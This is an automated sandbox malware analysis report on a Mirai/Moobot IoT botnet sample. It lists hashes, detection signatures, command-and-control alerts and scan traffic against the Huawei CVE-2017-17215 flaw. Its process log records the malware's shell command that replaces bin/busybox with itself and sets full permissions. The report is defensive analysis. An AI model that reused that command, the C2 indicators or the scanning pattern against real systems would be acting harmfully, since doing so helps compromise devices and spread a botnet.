Linux Analysis Report
mbl5k2b7z8.elf

Overview

General Information

Sample Name:mbl5k2b7z8.elf
Original Sample Name:d7f3432247daa3564a2f9f282fd892ca.elf
Analysis ID:830716
MD5:d7f3432247daa3564a2f9f282fd892ca
SHA1:58ddd0d4593d6362f371acb8877671edb8463d99
SHA256:686fb10624e0f6001922f5a7da9d6c10671b960e04da8cb6300bd81671d4407d
Tags:32, elf, mips, mirai
Infos:

Detection

Mirai, Moobot
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Performs DNS queries to domains with low reputation
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830716
Start date and time:2023-03-20 16:23:54 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 6s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:mbl5k2b7z8.elf
Original Sample Name:d7f3432247daa3564a2f9f282fd892ca.elf
Detection:MAL
Classification:mal96.troj.linELF@0/0@1/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: test.zxyes.xyz
Command:/tmp/mbl5k2b7z8.elf
PID:6231
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • mbl5k2b7z8.elf (PID: 6231, Parent: 6130, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/mbl5k2b7z8.elf
    • sh (PID: 6233, Parent: 6231, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/mbl5k2b7z8.elf bin/busybox; chmod 777 bin/busybox"
      • sh New Fork (PID: 6235, Parent: 6233)
      • rm (PID: 6235, Parent: 6233, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/busybox
      • sh New Fork (PID: 6236, Parent: 6233)
      • mkdir (PID: 6236, Parent: 6233, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6237, Parent: 6233)
      • mv (PID: 6237, Parent: 6233, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/mbl5k2b7z8.elf bin/busybox
      • sh New Fork (PID: 6238, Parent: 6233)
      • chmod (PID: 6238, Parent: 6233, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/busybox
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Mirai | Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
MooBot | | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
Source | Rule | Description | Author | Strings
mbl5k2b7z8.elf | JoeSecurity_Moobot | Yara detected Moobot | Joe Security |
mbl5k2b7z8.elf | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
mbl5k2b7z8.elf | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown |
Source | Rule | Description | Author | Strings
6231.1.00007f8304400000.00007f8304414000.r-x.sdmp | JoeSecurity_Moobot | Yara detected Moobot | Joe Security |
6231.1.00007f8304400000.00007f8304414000.r-x.sdmp | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
6231.1.00007f8304400000.00007f8304414000.r-x.sdmp | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown |
Process Memory Space: mbl5k2b7z8.elf PID: 6231 | JoeSecurity_Moobot | Yara detected Moobot | Joe Security |
Process Memory Space: mbl5k2b7z8.elf PID: 6231 | Linux_Trojan_Gafgyt_28a2fe0c | unknown | unknown |
Timestamp:03/20/23-16:24:46.219802
Source IP:192.168.2.23
Destination IP:195.133.40.202
SID:2030490
Source Port:36176
Destination Port:56999
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:03/20/23-16:25:01.651288
Source IP:192.168.2.23
Destination IP:163.18.94.240
SID:2835222
Source Port:60670
Destination Port:37215
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:03/20/23-16:25:13.708877
Source IP:195.133.40.202
Destination IP:192.168.2.23
SID:2030489
Source Port:56999
Destination Port:36176
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:03/20/23-16:25:15.146221
Source IP:192.168.2.23
Destination IP:34.128.181.63
SID:2835222
Source Port:54264
Destination Port:37215
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:03/20/23-16:25:08.055278
Source IP:192.168.2.23
Destination IP:41.37.71.18
SID:2835222
Source Port:33478
Destination Port:37215
Protocol:TCP
Classtype:A Network Trojan was detected

AV Detection

Source: mbl5k2b7z8.elf | ReversingLabs: Detection: 64%
Source: mbl5k2b7z8.elf | Virustotal: Detection: 59%

Networking

Source: Traffic | Snort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:36176 -> 195.133.40.202:56999
Source: Traffic | Snort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 195.133.40.202:56999 -> 192.168.2.23:36176
Source: Traffic | Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60670 -> 163.18.94.240:37215
Source: Traffic | Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33478 -> 41.37.71.18:37215
Source: Traffic | Snort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54264 -> 34.128.181.63:37215
Source: global traffic | TCP traffic: 197.4.207.53 ports 1,2,3,5,7,37215
Source: global traffic | TCP traffic: 41.203.171.49 ports 1,2,3,5,7,37215
Source: unknown | Network traffic detected: HTTP traffic on port 60670 -> 37215
Source: unknown | Network traffic detected: HTTP traffic on port 33478 -> 37215
Source: unknown | Network traffic detected: HTTP traffic on port 37215 -> 33478
Source: unknown | Network traffic detected: HTTP traffic on port 54264 -> 37215
Source: unknown | Network traffic detected: HTTP traffic on port 44838 -> 37215
Source: unknown | Network traffic detected: HTTP traffic on port 52512 -> 37215
Source: unknown | Network traffic detected: HTTP traffic on port 46706 -> 37215
Source: unknown | Network traffic detected: HTTP traffic on port 37215 -> 52512
Source: unknown | Network traffic detected: HTTP traffic on port 56602 -> 37215
Source: unknown | Network traffic detected: HTTP traffic on port 37215 -> 56602
Source: unknown | Network traffic detected: HTTP traffic on port 44448 -> 37215
Source: unknown | Network traffic detected: HTTP traffic on port 58890 -> 37215
Source: unknown | Network traffic detected: HTTP traffic on port 44552 -> 37215
Source: unknown | Network traffic detected: HTTP traffic on port 55072 -> 37215
Source: DNS query: test.zxyes.xyz
Source: global traffic | TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic | TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic | TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic | TCP traffic: 192.168.2.23:36176 -> 195.133.40.202:56999
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.116.170.228:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 63.69.33.227:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.61.200.132:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 24.97.25.101:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.19.57.54:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.4.86.18:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.232.148.83:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.196.6.114:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.94.157.86:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.238.233.127:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.100.45.107:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 135.220.157.234:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.117.127.40:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 39.253.106.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.152.228.112:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.223.58.168:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 114.129.248.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 27.244.149.57:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.119.190.158:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 193.251.12.172:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 151.94.129.171:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.135.252.9:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 53.53.156.55:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.1.159.190:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.166.96.106:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.199.164.130:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 46.98.228.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.120.95.154:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 209.119.187.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 1.95.32.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.71.17.38:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 88.13.234.255:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.17.129.116:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.21.35.5:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.1.171.164:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.0.20.172:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.23.166.250:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.128.42.228:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.225.14.173:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.186.232.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.76.28.190:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 50.88.242.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.137.97.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.62.93.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.173.81.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 133.110.222.217:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.59.114.101:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.8.177.255:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.154.40.229:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.109.220.93:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.58.250.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.59.220.64:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.106.130.195:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.225.169.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.11.34.176:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.213.57.212:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.129.196.111:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 111.64.249.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 52.3.196.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.245.193.1:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 27.68.209.57:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 208.119.4.39:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 64.214.66.72:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.10.152.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.181.217.157:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.72.212.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.253.30.5:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.54.171.141:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 52.213.233.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.76.113.83:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.145.168.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.245.239.14:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.96.120.246:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.250.216.35:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.56.111.86:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.95.39.45:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.129.21.7:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 194.172.43.78:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.7.217.120:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.117.248.134:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.122.221.26:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.254.173.176:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 108.9.179.207:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.85.10.59:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.173.72.94:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.105.255.14:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.108.113.14:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.86.78.165:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 67.114.128.62:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 138.186.46.93:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 120.2.93.207:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.91.23.183:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.58.136.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 204.192.188.218:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.20.210.24:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.73.124.127:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.179.170.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.65.55.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.177.253.151:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.133.117.175:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.131.88.164:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 144.228.62.84:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 1.58.60.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.172.139.78:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.76.111.81:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.46.149.8:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.79.34.115:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.136.244.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.233.200.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 84.153.0.23:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.235.150.175:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.99.43.183:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.73.51.59:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.34.79.85:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.51.84.6:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.81.93.19:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.232.202.44:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.182.216.74:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.229.250.93:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 70.11.247.218:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.218.42.102:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.67.46.55:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 138.71.114.10:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.198.106.172:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.59.188.32:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.21.111.241:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 84.75.225.46:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.104.171.210:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.250.250.74:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.125.230.72:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.211.88.126:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.195.2.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.10.135.49:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.70.126.29:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 163.154.32.173:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.219.155.75:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.221.232.158:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.66.200.233:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.89.152.141:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.136.153.58:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.97.217.40:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.45.116.126:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 50.140.141.146:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.135.85.75:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 107.20.197.28:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.119.25.180:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 116.48.77.113:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.49.46.126:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.57.48.177:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.117.34.90:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.75.73.130:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.224.78.13:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.100.146.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.17.203.228:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.7.234.146:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.18.172.90:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 164.100.55.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 128.201.128.166:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.52.137.162:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 168.104.148.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.170.124.228:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 117.255.199.59:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 23.253.65.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 79.31.151.108:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 32.121.47.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 115.49.224.160:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 75.238.169.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.22.170.122:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.122.149.109:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.132.136.140:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.209.93.22:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.200.113.24:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 9.76.100.190:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.20.241.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.255.175.245:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.53.76.173:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.87.168.135:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.98.206.90:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.97.43.244:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.67.106.215:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.62.218.87:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.127.208.154:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 48.151.209.13:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.162.250.103:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.199.239.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.17.156.146:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.74.0.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 184.13.55.45:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 201.49.160.226:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 68.105.94.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 149.127.189.127:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.131.209.137:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.137.194.204:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 65.52.84.227:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 42.139.68.52:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 125.65.250.246:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.233.189.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.109.178.100:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.248.23.103:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.192.30.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.107.35.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.75.124.226:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.177.94.219:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.184.53.196:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 182.68.175.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.121.192.153:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.177.178.219:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.190.12.227:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.12.228.254:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.1.56.22:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.130.57.114:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.43.43.85:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.27.134.156:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.24.121.250:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 124.109.41.52:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.188.62.66:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 190.230.140.154:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.170.29.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.254.133.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 49.139.124.21:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.143.90.128:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.234.26.88:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.172.40.183:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.249.97.39:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.211.188.136:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 2.206.151.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.252.197.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.130.224.143:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.255.60.250:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.252.185.216:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 100.50.25.81:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 43.238.243.160:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 193.249.211.243:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.214.109.130:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.49.104.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.193.107.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 51.200.195.68:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.95.165.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.195.81.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.218.25.123:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 64.56.4.141:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.98.204.119:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.55.30.243:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.15.147.119:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.96.209.126:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.86.14.30:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.236.248.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.210.226.25:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.169.85.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.157.82.125:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.178.137.75:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 124.191.205.213:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.65.80.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.224.36.39:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.127.120.230:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.105.150.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.162.255.191:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 197.175.255.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 157.144.68.158:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 24.139.137.132:37215
            Source: global trafficTCP traffic: 192.168.2.23:48657 -> 41.16.166.46:37215
